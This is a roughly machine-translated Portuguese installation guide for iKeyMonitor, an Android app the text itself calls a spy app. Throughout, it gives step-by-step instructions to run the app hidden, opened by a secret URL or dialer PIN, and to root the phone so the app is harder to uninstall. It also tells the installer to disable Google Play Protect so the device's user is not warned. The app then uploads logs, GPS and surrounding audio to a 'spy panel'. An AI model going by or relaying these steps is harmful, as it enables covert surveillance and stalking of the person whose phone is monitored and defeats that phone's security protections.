Guia de Instalação iKeyMonitor Android

INSTALAR

1. Permitir aplicativo instala a partir de “fontes desconhecidas”

• Vá para Configurações> Segurança> tick “Fontes desconhecidas

2. Toque no arquivo baixado “iKeyMonitor-Android.apk” para instalá-lo

3. Abra-o após a instalação completa

Nota:
Se você escolher “Feito”Após a instalação, localize e toque no ícone iKeyMonitor na tela do dispositivo para iniciar o software.

4 maneiras de abrir iKeyMonitor:

Logo após a instalação, aplicação iKeyMonitor é lançado e começa a trabalhar em um modo de fundo. Os ícones que aparecem na tela inicial e barra de notificação pode ser desativado a partir Assistente iKeyMonitor. Consulte o seu guia. Para uma melhor experiência do usuário, existem 2 opções: ou para mantê-los exibido na tela inicial e notificação da barra do dispositivo monitorado ou não.

1. Visita https://ikeymonitor.com/openapp com o browser do telefone (Modo Oculto)
  2. Dial PIN # 8888 * com o teclado de discagem de chamadas (Modo Oculto)
  3. Toque no ícone iKeyMonitor na barra de notificação (modo visível)
  4. Toque no ícone iKeyMonitor na tela inicial (modo visível)

4. Para dispositivo enraizada, acesso root Grant iKeyMonitor e convertê-lo para Sistema App

• Para dispositivo enraizada, conceda acesso root iKeyMonitor e alterar notificação para pessoas com mobilidade condicionada em Supersu / superusuário.
  • Para dispositivo enraizada, converter iKeyMonitor a aplicação do sistema a partir iKeyMonitor - Configurações para torná-lo mais difícil de ser morto ou desinstalado. Reinicializar o dispositivo após a conversão.

CONFIGURAÇÃO

1. Enable "Internet/Network Service" in "Accessibility Service" and "Usage Access"

• Depois de logado, siga os diálogos de pop-up para permitir iKeyMonitor no Serviço de Acessibilidade, Acesso Uso e a otimização de bateria.

2. Desligue Google Play Proteger

• Google Play Protect é ativado por padrão, por favor Desligue isso ou pode notificar o usuário para remover o aplicativo espião.
  • Pule esta etapa se você não tem Google Play Instalado (Por exemplo: para telefones China, Google Play não é instalado por padrão).
  1. Abre o teu Configurações do dispositivo Android> Segurança> Google Play Proteger
  2. Turn "dispositivo de varredura para ameaças de segurança" OFF.
  3. Nota:
    Em alguns telefones, essa configuração está localizado na Google Play App Store> Menu> Reproduzir Proteja

3. Configurações essencial para manter iKeyMonitor correr em background

• iKeyMonitor pode ser desativado / morto por Power Saver ou Task Cleaner do sistema Android, se você não configurar as definições essenciais.
  • Ver as definições essenciais Now!

• Go to "Device Management", check if your device is connected to the spy panel and view logs after some minutes.
  • iKeyMonitor carrega todos os registros a cada 5 minutos quando a tela do dispositivo é ON. Quando a tela está desligada (telefone de espera), apenas gps e registros circundantes serão carregados.
  • Confira o Guia do Usuário e FAQ se tiver dúvidas.